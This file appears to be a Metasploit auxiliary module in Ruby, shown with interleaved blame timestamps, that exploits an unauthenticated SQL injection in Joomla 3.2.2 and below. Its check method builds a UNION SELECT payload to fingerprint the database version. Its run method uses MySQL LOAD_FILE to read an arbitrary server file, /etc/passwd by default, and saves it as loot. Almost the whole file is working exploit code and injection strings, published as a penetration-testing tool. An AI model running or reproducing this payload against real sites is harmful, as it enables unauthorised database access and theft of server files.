2014-03-13 00:47:39 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-03-12 17:46:56 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
|
|
|
|
'Description' => %q{
|
|
|
|
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
|
|
|
|
which allows an attacker to access the database or read arbitrary files as the
|
2014-03-13 20:11:27 +00:00
|
|
|
'mysql' user. This module will only work if the mysql user Joomla is using
|
|
|
|
to access the database has the LOAD_FILE permission.
|
2014-03-12 17:46:56 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2014-03-20 17:07:50 +00:00
|
|
|
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
|
2014-03-12 17:46:56 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2014-03-20 01:41:32 +00:00
|
|
|
['EDB', '31459'],
|
|
|
|
['URL', 'http://developer.joomla.org/security/578-20140301-core-sql-injection.html']
|
2014-03-12 17:46:56 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Mar 2 2014'
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2014-03-20 02:03:50 +00:00
|
|
|
OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/']),
|
2014-03-13 00:47:39 +00:00
|
|
|
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
|
|
|
|
OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
|
2014-03-12 17:46:56 +00:00
|
|
|
], self.class)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2014-03-13 00:47:39 +00:00
|
|
|
def check
|
2014-03-13 01:11:55 +00:00
|
|
|
|
|
|
|
front_marker = Rex::Text.rand_text_alpha(6)
|
|
|
|
back_marker = Rex::Text.rand_text_alpha(6)
|
|
|
|
|
2014-03-13 00:47:39 +00:00
|
|
|
payload = datastore['CATEGORYID'].to_s
|
2014-03-19 14:51:34 +00:00
|
|
|
payload << ") UNION ALL SELECT CONCAT(0x#{front_marker.unpack('H*')[0]},"
|
|
|
|
payload << "IFNULL(CAST(VERSION() "
|
|
|
|
payload << "AS CHAR),0x20),0x#{back_marker.unpack('H*')[0]})#"
|
2014-03-13 00:47:39 +00:00
|
|
|
|
|
|
|
resp = send_request_cgi({
|
2014-03-19 14:51:34 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php', 'weblinks-categories'),
|
|
|
|
'vars_get' => {
|
|
|
|
'id' => payload
|
|
|
|
}
|
2014-03-13 00:47:39 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
if !resp or !resp.body
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
2014-03-19 23:46:57 +00:00
|
|
|
if resp.body =~ /404<\/span> Category not found/
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
|
2014-03-13 01:11:55 +00:00
|
|
|
version = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
|
2014-03-13 00:47:39 +00:00
|
|
|
|
|
|
|
if !version
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
2014-03-13 01:11:55 +00:00
|
|
|
version = version[1].gsub(front_marker, '').gsub(back_marker, '')
|
2014-03-13 00:47:39 +00:00
|
|
|
print_good("Fingerprinted: #{version}")
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
2014-03-12 17:46:56 +00:00
|
|
|
|
|
|
|
def run
|
2014-03-13 01:11:55 +00:00
|
|
|
front_marker = Rex::Text.rand_text_alpha(6)
|
|
|
|
back_marker = Rex::Text.rand_text_alpha(6)
|
2014-03-12 17:46:56 +00:00
|
|
|
file = datastore['FILEPATH'].unpack("H*")[0]
|
2014-03-13 00:47:39 +00:00
|
|
|
catid = datastore['CATEGORYID']
|
|
|
|
|
2014-03-24 17:03:12 +00:00
|
|
|
payload = catid.to_s
|
2014-03-19 14:51:34 +00:00
|
|
|
payload << ") UNION ALL SELECT CONCAT(0x#{front_marker.unpack('H*')[0]}"
|
|
|
|
payload << ",IFNULL(CAST(HEX(LOAD_FILE("
|
|
|
|
payload << "0x#{file})) AS CHAR),0x20),0x#{back_marker.unpack('H*')[0]})#"
|
2014-03-13 00:47:39 +00:00
|
|
|
|
2014-03-12 17:46:56 +00:00
|
|
|
resp = send_request_cgi({
|
2014-03-19 14:51:34 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php', 'weblinks-categories'),
|
|
|
|
'vars_get' => {
|
|
|
|
'id' => payload
|
|
|
|
}
|
2014-03-12 17:46:56 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
if !resp or !resp.body
|
|
|
|
fail_with("Server did not respond in an expected way. Verify the IP address.")
|
|
|
|
end
|
|
|
|
|
2014-03-19 23:46:57 +00:00
|
|
|
if resp.body =~ /404<\/span> Category not found/
|
|
|
|
fail_with("The category ID was invalid. Please try again with a valid category ID")
|
|
|
|
end
|
|
|
|
|
2014-03-13 01:11:55 +00:00
|
|
|
file = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
|
2014-03-12 17:46:56 +00:00
|
|
|
|
2014-03-13 00:47:39 +00:00
|
|
|
if !file
|
|
|
|
fail_with("Either the file didn't exist or the server has been patched.")
|
|
|
|
end
|
|
|
|
|
2014-03-13 01:11:55 +00:00
|
|
|
file = file[1].gsub(front_marker, '').gsub(back_marker, '')
|
2014-03-12 17:46:56 +00:00
|
|
|
file = [file].pack("H*")
|
|
|
|
|
2014-03-13 20:38:43 +00:00
|
|
|
if file == '' or file == "\x00"
|
|
|
|
fail_with("Either the file didn't exist or the database user does not have LOAD_FILE permissions")
|
|
|
|
end
|
|
|
|
|
2014-03-12 17:46:56 +00:00
|
|
|
path = store_loot("joomla.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])
|
|
|
|
|
|
|
|
if path and path != ''
|
|
|
|
print_good("File saved to: #{path}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|